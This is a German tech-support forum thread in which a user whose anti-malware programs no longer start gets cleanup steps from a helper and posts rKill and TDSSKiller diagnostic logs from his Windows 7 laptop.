| |
| |||||||
Plagegeister aller Art und deren Bekämpfung: Anti Malware Programme lassen sich nicht mehr startenWindows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
 |
01.10.2017, 18:20
| #1 |
 |  Anti Malware Programme lassen sich nicht mehr starten Hallo zusammen, wie im Titel beschrieben lassen sich bei mir plötzlich weder Malwarebytes noch Windows Defender starten. Keinerlei Fehlermeldungen, die Programme kommen einfach nicht hoch, kein Eintrag im Taskmanager. Bisher liefen diese Programm einwandfrei. Wollte heute aus unten stehenden Gründen Malwarebytes laufen lassen. Ich habe einen HP Laptop mit Win 7 Pro, 64 mit 8G Ram und 4 Prozessoren. Vielleicht noch folgende Info: Eigentlich will/wollte ich einen Mikrophonfehler beheben. Mein Mikro schaltet sich seit ein paar Tagen willkürlich, in unterschiedlichen Abständen von alleine aus. Egal mit welcher Anwendung, Skype, TeamViewer, Zoom. Egal welche Settings und Treiberaktualisierungen ich vornehme. In einem Forum erhielt ich den Tip Malwarebytes nach rootkits(was ist das?  ) suchen zu lassen. Dabei fiel mir dann auf, dass ich Malwarebytes nicht starten kann.Da kam mir der Verdacht, dass evtl. auch der Mikrofehler daran liegen könnte. Evtl. noch ein Hinweis: Ich kann mich seit ein paar(~ 3) Tagen auch nicht mehr an meinem Router(GigaCube) anmelden. Name/Passwort werden plötzlich abgelehnt obwohl ich weder einen Reset gemacht noch das Login geändert habe. Vielleicht nicht relevant. Könnte auch am Router liegen. Habe gerade Malwarebytes nochmal neu installiert. Während der Installation alles ok aber danach kann ich es nicht öffnen(als admin). Nach Klick auf die Verknüpfung oder direkt im Verzeichnis auf die .exe rödelt der Rechner ein bisschen und das wars. Kein Fenster, keine Möglichkeit einen Scan zu starten, keine Fehlermeldung. Das gleiche Verhalten bzgl. Defender. *seufz* Vielen Dank im voraus Christian Geändert von ranxero (01.10.2017 um 18:57 Uhr) |
|
01.10.2017, 20:11
| #2 |
| /// TB-Ausbilder   | Anti Malware Programme lassen sich nicht mehr starten Mein Name ist Matthias und ich werde dir bei der Bereinigung deines Computers helfen. Um die Bereinigung möchlichst effektiv und schnell gestalten zu können, bitte ich um Beachtung der folgenden Hinweise:
Bitte arbeite alle Schritte in der vorgegebenen Reihefolge nacheinander ab und poste alle Logdateien in CODE-Tags:  So funktioniert es:Posten in CODE-Tags Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR, 7Z-Archive zu packen erschwert deinem Helfer massiv die Arbeit, es sei denn natürlich die Datei wäre ansonsten zu groß für das Forum. Um die Logfiles in eine CODE-Box zu stellen gehe so vor:
Danke für deine Mitarbeit! Schritt 0 Bitte lade dir rKill von Grinler auf deinen Desktop von einem der folgenden Links: RKill oder http://www.trojaner-board.de/85629-rkill-download.html
Schritt 1 Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop:  FRST 32-Bit | FRST 64-Bit(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)
Schritt 2 Downloade dir bitte  TDSSKiller.exe und speichere diese Datei auf dem Desktop
Bitte poste mit deiner nächsten Antwort
|
|
01.10.2017, 20:25
| #3 |
| | Anti Malware Programme lassen sich nicht mehr starten erstmal vielen Dank für deine hilfe
__________________hier rkill log ... die anderen schritte folgen sobald sie fertig sind Code:
ATTFilter
Rkill 2.9.1 by Lawrence Abrams (Grinler)
hxxp://www.bleepingcomputer.com/
Copyright 2008-2017 BleepingComputer.com
More Information about Rkill can be found at this link:
hxxp://www.bleepingcomputer.com/forums/topic308364.html
Program started at: 10/01/2017 09:17:26 PM in x64 mode.
Windows Version: Windows 7 Professional Service Pack 1
Checking for Windows services to stop:
* No malware services found to stop.
Checking for processes to terminate:
* C:\Windows\system32\valWBFPolicyService.exe (PID: 2588) [WD-HEUR]
1 proccess terminated!
Checking Registry for malware related settings:
* No issues found in the Registry.
Resetting .EXE, .COM, & .BAT associations in the Windows Registry.
Performing miscellaneous checks:
* No issues found.
Searching for Missing Digital Signatures:
* No issues found.
Checking HOSTS File:
* HOSTS file entries found:
127.0.0.1 stockparser
127.0.0.1 code-sales.localhost
127.0.0.1 joomla360.localhost
127.0.0.1 dani.localhost
127.0.0.1 three83.localhost
127.0.0.1 threemotion.localhost
127.0.0.1 threeegoshooter.localhost
127.0.0.1 phalcon-devtools.localhost
127.0.0.1 phalcon.localhost
127.0.0.1 cakephp334.localhost
127.0.0.1 Pruefung2.localhost
127.0.0.1 xmlrpc.localhost
127.0.0.1 laraveloctobercms.localhost
127.0.0.1 laravelbootstrapcms.localhost
127.0.0.1 laravelitecms.localhost
127.0.0.1 typo3-876
127.0.0.1 typo3-7621
127.0.0.1 node-cluster-test
Program finished at: 10/01/2017 09:23:35 PM
Execution time: 0 hours(s), 6 minute(s), and 8 seconds(s)
|
|
01.10.2017, 20:31
| #4 |
| /// TB-Ausbilder | Anti Malware Programme lassen sich nicht mehr starten Ok |
|
01.10.2017, 20:34
| #5 |
| | Anti Malware Programme lassen sich nicht mehr starten schritt #1 kann ich nicht ausführen, da wie in dem anderen post beschrieben, bei klick auf den Link sofort der Browser geschlossen wird und der Rechner neugestartet. Tatsache! Kein Bluescreen, nur kurze "software access vioalation ... XYZ bla fasel" Nachricht, dann normaler Neustart. Ich habe schon probiert andere Dateien runterzuladen, z.B. MalwareBytes, keine Probleme dabei. |
|
01.10.2017, 20:37
| #6 |
| /// TB-Ausbilder | Anti Malware Programme lassen sich nicht mehr starten Servus, was hast du für ein AV-Programm installiert? Dieses vorher deaktivieren/deinstallieren... evtl. klappt es dann. |
|
02.10.2017, 17:27
| #7 |
| | Anti Malware Programme lassen sich nicht mehr starten ich habe kein AV programm, nur Windows Firewall und lasse regelmässig MB laufen. Das läuft seit ca. 2-3 Jahren problemlos edit: Habs grad nochmal probiert firefox -> Klick auf Link -> Browser schließt -> Rechner startet neu. Diesmal mit 3 Fehlerdialogen, die aber so schnell weg sind, dass ich nichts erkennen kann. kein Bluescreen ... weiah  soll ich den letzten schritt #2 trotzdem ausführen? ich schätze mal das hies 'ja' schritt #2 logfile Code:
ATTFilter
21:54:37.0832 0x1734 TDSS rootkit removing tool 3.1.0.15 Apr 18 2017 11:34:02
21:54:48.0179 0x1734 ============================================================
21:54:48.0179 0x1734 Current date / time: 2017/10/01 21:54:48.0179
21:54:48.0179 0x1734 SystemInfo:
21:54:48.0179 0x1734
21:54:48.0179 0x1734 OS Version: 6.1.7601 ServicePack: 1.0
21:54:48.0179 0x1734 Product type: Workstation
21:54:48.0179 0x1734 ComputerName: XXXXXXXX
21:54:48.0180 0x1734 UserName: XXXXXXXX
21:54:48.0180 0x1734 Windows directory: C:\Windows
21:54:48.0180 0x1734 System windows directory: C:\Windows
21:54:48.0180 0x1734 Running under WOW64
21:54:48.0180 0x1734 Processor architecture: Intel x64
21:54:48.0180 0x1734 Number of processors: 4
21:54:48.0180 0x1734 Page size: 0x1000
21:54:48.0180 0x1734 Boot type: Normal boot
21:54:48.0180 0x1734 CodeIntegrityOptions = 0x00000001
21:54:48.0180 0x1734 ============================================================
21:54:51.0727 0x1734 KLMD registered as C:\Windows\system32\drivers\40914632.sys
21:54:51.0727 0x1734 KLMD ARK init status: drvProperties = 0xFFF00, osBuild = 7601.23889, osProperties = 0x1
21:55:00.0980 0x1734 System UUID: {CFFB0BA7-3FE8-FEBC-A71A-587E6CAB6E68}
21:55:04.0968 0x1734 Drive \Device\Harddisk0\DR0 - Size: 0xE8E0DB6000 ( 931.51 Gb ), SectorSize: 0x200, Cylinders: 0x1DB01, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
21:55:05.0034 0x1734 ============================================================
21:55:05.0034 0x1734 \Device\Harddisk0\DR0:
21:55:05.0063 0x1734 MBR partitions:
21:55:05.0063 0x1734 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x63800
21:55:05.0063 0x1734 \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x64000, BlocksNum 0x723B3000
21:55:05.0063 0x1734 \Device\Harddisk0\DR0\Partition3: MBR, Type 0x7, StartLBA 0x72417000, BlocksNum 0x22BC000
21:55:05.0063 0x1734 \Device\Harddisk0\DR0\Partition4: MBR, Type 0xC, StartLBA 0x746D3000, BlocksNum 0x33000
21:55:05.0064 0x1734 ============================================================
21:55:05.0518 0x1734 C: <-> \Device\Harddisk0\DR0\Partition2
21:55:05.0753 0x1734 D: <-> \Device\Harddisk0\DR0\Partition3
21:55:05.0753 0x1734 ============================================================
21:55:05.0753 0x1734 Initialize success
21:55:05.0753 0x1734 ============================================================
21:55:57.0355 0x1a10 ============================================================
21:55:57.0355 0x1a10 Scan started
21:55:57.0355 0x1a10 Mode: Manual; SigCheck; TDLFS;
21:55:57.0355 0x1a10 ============================================================
21:55:57.0355 0x1a10 KSN ping started
21:55:58.0048 0x1a10 KSN ping finished: true
21:56:06.0753 0x1a10 ================ Scan system memory ========================
21:56:06.0753 0x1a10 System memory - ok
21:56:06.0754 0x1a10 ================ Scan services =============================
21:56:11.0938 0x1a10 [ A87D604AEA360176311474C87A63BB88, B1507868C382CD5D2DBC0D62114FCFBF7A780904A2E3CA7C7C1DD0844ADA9A8F ] 1394ohci C:\Windows\system32\drivers\1394ohci.sys
21:56:15.0214 0x1a10 1394ohci - ok
21:56:15.0374 0x1a10 [ F39180029723D7779C80360F9E255709, F4831FEE79AAF4DB66BF58D3F89B8A6DD8F38CD546B3C653BFF7052DDA112CC6 ] Accelerometer C:\Windows\system32\drivers\Accelerometer.sys
21:56:21.0281 0x1a10 Accelerometer - ok
21:56:21.0481 0x1a10 [ D81D9E70B8A6DD14D42D7B4EFA65D5F2, FDAAB7E23012B4D31537C5BDEF245BB0A12FA060A072C250E21C68E18B22E002 ] ACPI C:\Windows\system32\drivers\ACPI.sys
21:56:21.0539 0x1a10 ACPI - ok
21:56:21.0781 0x1a10 [ 99F8E788246D495CE3794D7E7821D2CA, F91615463270AD2601F882CAED43B88E7EDA115B9FD03FC56320E48119F15F76 ] AcpiPmi C:\Windows\system32\drivers\acpipmi.sys
21:56:24.0005 0x1a10 AcpiPmi - ok
21:56:24.0890 0x1a10 [ 9B112FDA1D5FB7B75627461001AC692A, 2EDF7C8FD59CD5FCD19FA528F60CBD6DDB9A8076AE0280B11D8EA8EAF7D39958 ] AdobeARMservice C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
21:56:24.0919 0x1a10 AdobeARMservice - ok
21:56:26.0425 0x1a10 [ 3E27E2DAA6869642B2DCB85C777E38B7, FB60068DFEA117006D8236DE73CC5A9B65272C6F739E2C8D1DD771360B9D989F ] AdobeFlashPlayerUpdateSvc C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
21:56:26.0489 0x1a10 AdobeFlashPlayerUpdateSvc - ok
21:56:26.0594 0x1a10 [ 2F6B34B83843F0C5118B63AC634F5BF4, 43E3F5FBFB5D33981AC503DEE476868EC029815D459E7C36C4ABC2D2F75B5735 ] adp94xx C:\Windows\system32\drivers\adp94xx.sys
21:56:26.0698 0x1a10 adp94xx - ok
21:56:26.0862 0x1a10 [ 597F78224EE9224EA1A13D6350CED962, DA7FD99BE5E3B7B98605BF5C13BF3F1A286C0DE1240617570B46FE4605E59BDC ] adpahci C:\Windows\system32\drivers\adpahci.sys
21:56:26.0963 0x1a10 adpahci - ok
21:56:27.0080 0x1a10 [ E109549C90F62FB570B9540C4B148E54, E804563735153EA00A00641814244BC8A347B578E7D63A16F43FB17566EE5559 ] adpu320 C:\Windows\system32\drivers\adpu320.sys
21:56:27.0137 0x1a10 adpu320 - ok
21:56:27.0240 0x1a10 [ 262D7C87D0AC20B96EF9877D3CA478A0, 54F7E5A5F8991C5525500C1ECCF3D3135D13F48866C366E52DF1D052DB2EE15B ] AeLookupSvc C:\Windows\System32\aelupsvc.dll
21:56:27.0412 0x1a10 AeLookupSvc - ok
21:56:27.0575 0x1a10 [ 0DC2A9882540DEA4A55B08785E09D8FC, 69B15724B0034F9915AACE109A6C596D6AF2DA350FC18C9A0CD98C81CB7EDEE3 ] AFD C:\Windows\system32\drivers\afd.sys
21:56:27.0772 0x1a10 AFD - ok
21:56:27.0962 0x1a10 [ 608C14DBA7299D8CB6ED035A68A15799, 45360F89640BF1127C82A32393BD76205E4FA067889C40C491602F370C09282A ] agp440 C:\Windows\system32\drivers\agp440.sys
21:56:28.0032 0x1a10 agp440 - ok
21:56:28.0102 0x1a10 [ 3290D6946B5E30E70414990574883DDB, 0E9294E1991572256B3CDA6B031DB9F39CA601385515EE59F1F601725B889663 ] ALG C:\Windows\System32\alg.exe
21:56:28.0672 0x1a10 ALG - ok
21:56:29.0082 0x1a10 [ 5812713A477A3AD7363C7438CA2EE038, A7316299470D2E57A11499C752A711BF4A71EB11C9CBA731ED0945FF6A966721 ] aliide C:\Windows\system32\drivers\aliide.sys
21:56:29.0152 0x1a10 aliide - ok
21:56:29.0502 0x1a10 [ A3FA2C3207A49122A8E789028DE3B3D7, EFC563B2DD679F17384B00CD670E5DCAE246343C762178ACBF83B794B192E0FA ] AMD External Events Utility C:\Windows\system32\atiesrxx.exe
21:56:29.0772 0x1a10 AMD External Events Utility - ok
21:56:29.0842 0x1a10 [ 05120427227F6F088ECA75942ED7ACA9, BD25436EB43C6718F5E6A4C3C24831189D3A893DC87AA0ADED993B7C3126F2E9 ] amdhub30 C:\Windows\system32\DRIVERS\amdhub30.sys
21:56:29.0872 0x1a10 amdhub30 - ok
21:56:29.0962 0x1a10 [ 1FF8B4431C353CE385C875F194924C0C, 3EA3A7F426B0FFC2461EDF4FDB4B58ACC9D0730EDA5B728D1EA1346EA0A02720 ] amdide C:\Windows\system32\drivers\amdide.sys
21:56:29.0999 0x1a10 amdide - ok
21:56:30.0247 0x1a10 [ 7024F087CFF1833A806193EF9D22CDA9, E7F27E488C38338388103D3B7EEDD61D05E14FB140992AEE6F492FFC821BF529 ] AmdK8 C:\Windows\system32\drivers\amdk8.sys
21:56:30.0338 0x1a10 AmdK8 - ok
21:56:30.0408 0x1a10 [ 704DDBC49CE4202978650410AC3D28B5, 0C6F0F0EDD57D16FDFC4422999CCC735D2B9F25B0D6555A339C0A3D76BB256EE ] amdkmcsp C:\Windows\system32\DRIVERS\amdkmcsp.sys
21:56:30.0518 0x1a10 amdkmcsp - ok
21:56:31.0577 0x1a10 [ 860B3502F5144061D5BA95D32DE1182A, 8AF5BB8F93A1BAAFB302DD05B37810D20B56C4C59AC5C6E9CAC13A49A0BF27D6 ] amdkmdag C:\Windows\system32\DRIVERS\atikmdag.sys
21:56:32.0326 0x1a10 amdkmdag - ok
21:56:32.0532 0x1a10 [ 7B6CF4EA28AFD1B394FA05BD73AA54A1, 09BBF5DB2186A06C45C1933D2C2B80645474B6F6EDF23877B2E7134CAC1736F2 ] amdkmdap C:\Windows\system32\DRIVERS\atikmpag.sys
21:56:32.0786 0x1a10 amdkmdap - ok
21:56:32.0856 0x1a10 [ EF4680F07516F6D61F6E0BA1D34B3A3A, C367B323B26CF56AA6260E41129AE5F2DC97CFD0A9D984D9D5C051BE61ACD247 ] amdkmpfd C:\Windows\system32\drivers\amdkmpfd.sys
21:56:32.0906 0x1a10 amdkmpfd - ok
21:56:33.0366 0x1a10 [ C27E46C19D5A48CA02C11E3C9B58F4C1, 69146539ED022B439370A4314ED6BDCC20BB96729652BDB278CE6854561EBB19 ] AmdLLD64 C:\Windows\system32\DRIVERS\AmdLLD64.sys
21:56:33.0456 0x1a10 AmdLLD64 - ok
21:56:33.0506 0x1a10 [ 1E56388B3FE0D031C44144EB8C4D6217, E88CA76FD47BA0EB427D59CB9BE040DE133D89D4E62D03A8D622624531D27487 ] AmdPPM C:\Windows\system32\drivers\amdppm.sys
21:56:33.0626 0x1a10 AmdPPM - ok
21:56:33.0676 0x1a10 [ 83E2896CAA706FD821AF2B7CACB73994, 0175AEB2B3FC707A2795C75E1A5187C3E6DFCCB07B5D720C1D9BD4B375D0049F ] amdpsp C:\Windows\system32\DRIVERS\amdpsp.sys
21:56:33.0706 0x1a10 amdpsp - ok
21:56:33.0936 0x1a10 [ D4121AE6D0C0E7E13AA221AA57EF2D49, 626F43C099BD197BE56648C367B711143C2BCCE96496BBDEF19F391D52FA01D0 ] amdsata C:\Windows\system32\drivers\amdsata.sys
21:56:34.0026 0x1a10 amdsata - ok
21:56:34.0186 0x1a10 [ F67F933E79241ED32FF46A4F29B5120B, D6EF539058F159CC4DD14CA9B1FD924998FEAC9D325C823C7A2DD21FEF1DC1A8 ] amdsbs C:\Windows\system32\drivers\amdsbs.sys
21:56:34.0256 0x1a10 amdsbs - ok
21:56:34.0356 0x1a10 [ 540DAF1CEA6094886D72126FD7C33048, 296578572A93F5B74E1AD443E000B79DC99D1CBD25082E02704800F886A3065F ] amdxata C:\Windows\system32\drivers\amdxata.sys
21:56:34.0376 0x1a10 amdxata - ok
21:56:34.0446 0x1a10 [ 7DCA2C59491D420947A0B529DB37C7CF, 4673DD141F02801A61FF057BE9DA7FD214C1F9ED31BCB035A8C4E44C579799E4 ] amdxhc C:\Windows\system32\DRIVERS\amdxhc.sys
21:56:34.0476 0x1a10 amdxhc - ok
21:56:34.0526 0x1a10 [ 033D09CD953C40B4AFBA9DCB1D1DFB8E, 629BE54E64C8B3FFE9F52820F6BF2802D50F719F63A621C998865FFD61C9F84E ] amd_sata C:\Windows\system32\drivers\amd_sata.sys
21:56:34.0556 0x1a10 amd_sata - ok
21:56:34.0606 0x1a10 [ F32F762E54137925E185E5FDA5F73826, A9CC747C0886628F8A5145FBE09FFCA6B5E4EFC0F4457E4824E004A329DFC765 ] amd_xata C:\Windows\system32\drivers\amd_xata.sys
21:56:34.0646 0x1a10 amd_xata - ok
21:56:34.0696 0x1a10 [ 086CA47573FAF282C93BE3416E1B6D65, 608D208B9D5FDB8A6DAABA939EAC664FFBFA294FD53CCD21942C27F1B8FF016A ] AppID C:\Windows\system32\drivers\appid.sys
21:56:34.0846 0x1a10 AppID - ok
21:56:34.0898 0x1a10 [ 5B502842E57F10BDC0301E15B98E3E26, 2FEC4F4409C9BF3A89E69C1806F8D9F37CF405E22971C68B5E297A43A8D6B3C4 ] AppIDSvc C:\Windows\System32\appidsvc.dll
21:56:35.0275 0x1a10 AppIDSvc - ok
21:56:35.0365 0x1a10 [ DE23E052E557580674785CDF45B613F3, A955ADC6CC7D816BA7CE1065F911E7A3295A1908C22BE0A3C506C38CFEE8DE0D ] Appinfo C:\Windows\System32\appinfo.dll
21:56:35.0535 0x1a10 Appinfo - ok
21:56:35.0785 0x1a10 [ 4ABA3E75A76195A3E38ED2766C962899, E2001ACD44DA270B8289DA362D26416676301773AB22616C211F31CF2E7869AA ] AppMgmt C:\Windows\System32\appmgmts.dll
21:56:35.0915 0x1a10 AppMgmt - ok
21:56:36.0015 0x1a10 [ C484F8CEB1717C540242531DB7845C4E, C507CE26716EB923B864ED85E8FA0B24591E2784A2F4F0E78AEED7E9953311F6 ] arc C:\Windows\system32\drivers\arc.sys
21:56:36.0065 0x1a10 arc - ok
21:56:36.0135 0x1a10 [ 019AF6924AEFE7839F61C830227FE79C, 5926B9DDFC9198043CDD6EA0B384C83B001EC225A8125628C4A45A3E6C42C72A ] arcsas C:\Windows\system32\drivers\arcsas.sys
21:56:36.0195 0x1a10 arcsas - ok
21:56:36.0859 0x1a10 [ 8637F3119057178364D200F2462E625C, 40CAE47AA6C6B23FEB95961FD06BB3EB075CA63BB91B54CB26215A368371B343 ] aspnet_state C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
21:56:37.0099 0x1a10 aspnet_state - ok
21:56:37.0244 0x1a10 [ 769765CE2CC62867468CEA93969B2242, 0D8F19D49869DF93A3876B4C2E249D12E83F9CE11DAE8917D368E292043D4D26 ] AsyncMac C:\Windows\system32\DRIVERS\asyncmac.sys
21:56:37.0581 0x1a10 AsyncMac - ok
21:56:37.0621 0x1a10 [ 02062C0B390B7729EDC9E69C680A6F3C, 0261683C6DC2706DCE491A1CDC954AC9C9E649376EC30760BB4E225E18DC5273 ] atapi C:\Windows\system32\drivers\atapi.sys
21:56:37.0658 0x1a10 atapi - ok
21:56:37.0860 0x1a10 [ 738CD83A9C61ADFD00984433DBA3DC78, DC767CAB626623DDE276FAE636FD80D2E5771C8689B77228C8E4208BBFF28DF1 ] AtiHDAudioService C:\Windows\system32\drivers\AtihdW76.sys
21:56:37.0906 0x1a10 AtiHDAudioService - ok
21:56:37.0968 0x1a10 [ 67C717EC24FCAAE7B518D9E06AD036AB, F08550E4FCEC2899FACEF2A18CEE3D068D5911FFD2FF5534E4921E56FB0AEF59 ] AudioEndpointBuilder C:\Windows\System32\Audiosrv.dll
21:56:38.0206 0x1a10 AudioEndpointBuilder - ok
21:56:38.0236 0x1a10 [ 67C717EC24FCAAE7B518D9E06AD036AB, F08550E4FCEC2899FACEF2A18CEE3D068D5911FFD2FF5534E4921E56FB0AEF59 ] AudioSrv C:\Windows\System32\Audiosrv.dll
21:56:38.0286 0x1a10 AudioSrv - ok
21:56:38.0396 0x1a10 [ A6BF31A71B409DFA8CAC83159E1E2AFF, CBB83F73FFD3C3FB4F96605067739F8F7A4A40B2B05417FA49E575E95628753F ] AxInstSV C:\Windows\System32\AxInstSV.dll
21:56:38.0486 0x1a10 AxInstSV - ok
21:56:38.0536 0x1a10 [ 3E5B191307609F7514148C6832BB0842, DE011CB7AA4A2405FAF21575182E0793A1D83DFFC44E9A7864D59F3D51D8D580 ] b06bdrv C:\Windows\system32\drivers\bxvbda.sys
21:56:38.0676 0x1a10 b06bdrv - ok
21:56:38.0706 0x1a10 [ B5ACE6968304A3900EEB1EBFD9622DF2, 1DAA118D8CA3F97B34DF3D3CDA1C78EAB2ED225699FEABE89D331AE0CB7679FA ] b57nd60a C:\Windows\system32\DRIVERS\b57nd60a.sys
21:56:38.0846 0x1a10 b57nd60a - ok
21:56:39.0029 0x1a10 [ 9E84A931DBEE0292E38ED672F6293A99, 2945EAF0AC091709E0C5508B45EC343EDE507AC2B08A2D7D64F286D38424CBC4 ] BCM43XX C:\Windows\system32\DRIVERS\bcmwl664.sys
21:56:39.0129 0x1a10 BCM43XX - ok
21:56:39.0172 0x1a10 [ FDE360167101B4E45A96F939F388AEB0, 8D1457E866BBD645C4B9710DFBFF93405CC1193BF9AE42326F2382500B713B82 ] BDESVC C:\Windows\System32\bdesvc.dll
21:56:39.0232 0x1a10 BDESVC - ok
21:56:39.0252 0x1a10 [ 16A47CE2DECC9B099349A5F840654746, 77C008AEDB07FAC66413841D65C952DDB56FE7DCA5E9EF9C8F4130336B838024 ] Beep C:\Windows\system32\drivers\Beep.sys
21:56:39.0342 0x1a10 Beep - ok
21:56:39.0422 0x1a10 [ 82974D6A2FD19445CC5171FC378668A4, 075D25F47C0D2277E40AF8615571DAA5EB16B1824563632A9A7EC62505C29A4A ] BFE C:\Windows\System32\bfe.dll
21:56:39.0532 0x1a10 BFE - ok
21:56:39.0882 0x1a10 bigsql.bam2 - ok
21:56:39.0952 0x1a10 [ 1EA7969E3271CBC59E1730697DC74682, D511A34D63A6E0E6E7D1879068E2CD3D87ABEAF4936B2EA8CDDAD9F79D60FA04 ] BITS C:\Windows\System32\qmgr.dll
21:56:41.0268 0x1a10 BITS - ok
21:56:41.0368 0x1a10 [ 61583EE3C3A17003C4ACD0475646B4D3, 17E4BECC309C450E7E44F59A9C0BBC24D21BDC66DFBA65B8F198A00BB47A9811 ] blbdrive C:\Windows\system32\drivers\blbdrive.sys
21:56:41.0408 0x1a10 blbdrive - ok
21:56:41.0448 0x1a10 [ ABA3984C822E4D3F889699912D85D6C5, 2251FA135CC290DA13DAE4743F393C7CC9E6A737C054707CB8D72C369D1FFACB ] bowser C:\Windows\system32\DRIVERS\bowser.sys
21:56:41.0538 0x1a10 bowser - ok
21:56:41.0608 0x1a10 [ F09EEE9EDC320B5E1501F749FDE686C8, 66691114C42E12F4CC6DC4078D4D2FA4029759ACDAF1B59D17383487180E84E3 ] BrFiltLo C:\Windows\system32\drivers\BrFiltLo.sys
21:56:41.0738 0x1a10 BrFiltLo - ok
21:56:41.0818 0x1a10 [ B114D3098E9BDB8BEA8B053685831BE6, 0ED23C1897F35FA00B9C2848DE4ED200E18688AA7825674888054BBC3A3EB92C ] BrFiltUp C:\Windows\system32\drivers\BrFiltUp.sys
21:56:41.0868 0x1a10 BrFiltUp - ok
21:56:41.0928 0x1a10 [ 05F5A0D14A2EE1D8255C2AA0E9E8E694, 40011138869F5496A3E78D38C9900B466B6F3877526AC22952DCD528173F4645 ] Browser C:\Windows\System32\browser.dll
21:56:41.0988 0x1a10 Browser - ok
21:56:42.0018 0x1a10 [ 43BEA8D483BF1870F018E2D02E06A5BD, 4E6F5A5FD8C796A110B0DC9FF29E31EA78C04518FC1C840EF61BABD58AB10272 ] Brserid C:\Windows\System32\Drivers\Brserid.sys
21:56:42.0078 0x1a10 Brserid - ok
21:56:42.0108 0x1a10 [ A6ECA2151B08A09CACECA35C07F05B42, E2875BB7768ABAF38C3377007AA0A3C281503474D1831E396FB6599721586B0C ] BrSerWdm C:\Windows\System32\Drivers\BrSerWdm.sys
21:56:42.0148 0x1a10 BrSerWdm - ok
21:56:42.0198 0x1a10 [ B79968002C277E869CF38BD22CD61524, 50631836502237AF4893ECDCEA43B9031C3DE97433F594D46AF7C3C77F331983 ] BrUsbMdm C:\Windows\System32\Drivers\BrUsbMdm.sys
21:56:42.0258 0x1a10 BrUsbMdm - ok
21:56:42.0288 0x1a10 [ A87528880231C54E75EA7A44943B38BF, 4C8BBB29FDA76A96840AA47A8613C15D4466F9273A13941C19507008629709C9 ] BrUsbSer C:\Windows\System32\Drivers\BrUsbSer.sys
21:56:42.0358 0x1a10 BrUsbSer - ok
21:56:42.0548 0x1a10 [ C7391ABC9792BD782A987D4A8DBDAA40, 74776E43EA6BBE9BD02EFE86206416D8E482EF52833202DA11DCC52C11D21FE0 ] BstHdAndroidSvc C:\Program Files (x86)\Bluestacks\HD-Service.exe
21:56:42.0618 0x1a10 BstHdAndroidSvc - ok
21:56:42.0768 0x1a10 [ 8E0F0908F20033040FA09A682E65E9B2, 36909F32B41BB2E710B3ECEC707DB7E68149964B4712A2958C864BEF00851402 ] BstHdDrv C:\Program Files (x86)\Bluestacks\HD-Hypervisor-amd64.sys
21:56:42.0838 0x1a10 BstHdDrv - ok
21:56:42.0928 0x1a10 [ 98814E435AF3ECD147164274AB949D39, 0F4073C7F80BFA8585D27198BCC7C352167CA44988657FE523A35DAFD329C9CA ] BstHdLogRotatorSvc C:\Program Files (x86)\Bluestacks\HD-LogRotatorService.exe
21:56:42.0968 0x1a10 BstHdLogRotatorSvc - ok
21:56:43.0088 0x1a10 [ 05D59D9291446CC85613A19DEB43C30A, 5CF95DEFB1079B23BF6FAD57603DCAF886354B2ED452AFFD7C0B99B96E6881DD ] BstHdPlusAndroidSvc C:\Program Files (x86)\Bluestacks\HD-Plus-Service.exe
21:56:43.0138 0x1a10 BstHdPlusAndroidSvc - ok
21:56:43.0268 0x1a10 [ 7DB8EE09821A6D81A19A6591C9B8AA3A, 0A9A826560884F95D64BDC8A2076AE33FB718A3A59C0BBEC48E48A5FB907ACA4 ] BstkDrv C:\Program Files (x86)\Bluestacks\BstkDrv.sys
21:56:43.0338 0x1a10 BstkDrv - ok
21:56:43.0378 0x1a10 [ CF98190A94F62E405C8CB255018B2315, E1B2540023C4FE9FD588E4B6AE6347DFA565EB3898F21E5360882BF3E8B5E781 ] BthEnum C:\Windows\system32\DRIVERS\BthEnum.sys
21:56:43.0568 0x1a10 BthEnum - ok
21:56:43.0658 0x1a10 [ 9DA669F11D1F894AB4EB69BF546A42E8, B498B8B6CEF957B73179D1ADAF084BBB57BB3735D810F9BE2C7B1D58A4FD25A4 ] BTHMODEM C:\Windows\system32\DRIVERS\bthmodem.sys
21:56:43.0728 0x1a10 BTHMODEM - ok
21:56:43.0768 0x1a10 [ 5A8951D195AFEF979C4AB02A129EBC37, 48FD4A921E51B6DD306A1248EB9A1A6AEC5F59E49528423BF2F40600B3AF1D08 ] BthPan C:\Windows\system32\drivers\bthpan.sys
21:56:43.0818 0x1a10 BthPan - ok
21:56:43.0878 0x1a10 [ 738D0E9272F59EB7A1449C3EC118E6C4, FE3D32C2A5E4DC21376A0F89C0B2EE024ECF1A3FB99213CC9BBC986ADF7AF080 ] BTHPORT C:\Windows\system32\Drivers\BTHport.sys
21:56:43.0948 0x1a10 BTHPORT - ok
21:56:44.0008 0x1a10 [ 95F9C2976059462CBBF227F7AAB10DE9, 2797AE919FF7606B070FB039CECDB0707CD2131DCAC09C5DF14F443D881C9F34 ] bthserv C:\Windows\system32\bthserv.dll
21:56:44.0108 0x1a10 bthserv - ok
21:56:44.0148 0x1a10 [ F188B7394D81010767B6DF3178519A37, 576304E92FD94908F093A6AB5F4D328F25829BE32EC3CA0D29EBFDF5DE83539B ] BTHUSB C:\Windows\system32\Drivers\BTHUSB.sys
21:56:44.0198 0x1a10 BTHUSB - ok
21:56:44.0288 0x1a10 [ B8BD2BB284668C84865658C77574381A, 6C55BA288B626DF172FDFEA0BD7027FAEBA1F44EF20AB55160D7C7DC6E717D65 ] cdfs C:\Windows\system32\DRIVERS\cdfs.sys
21:56:44.0418 0x1a10 cdfs - ok
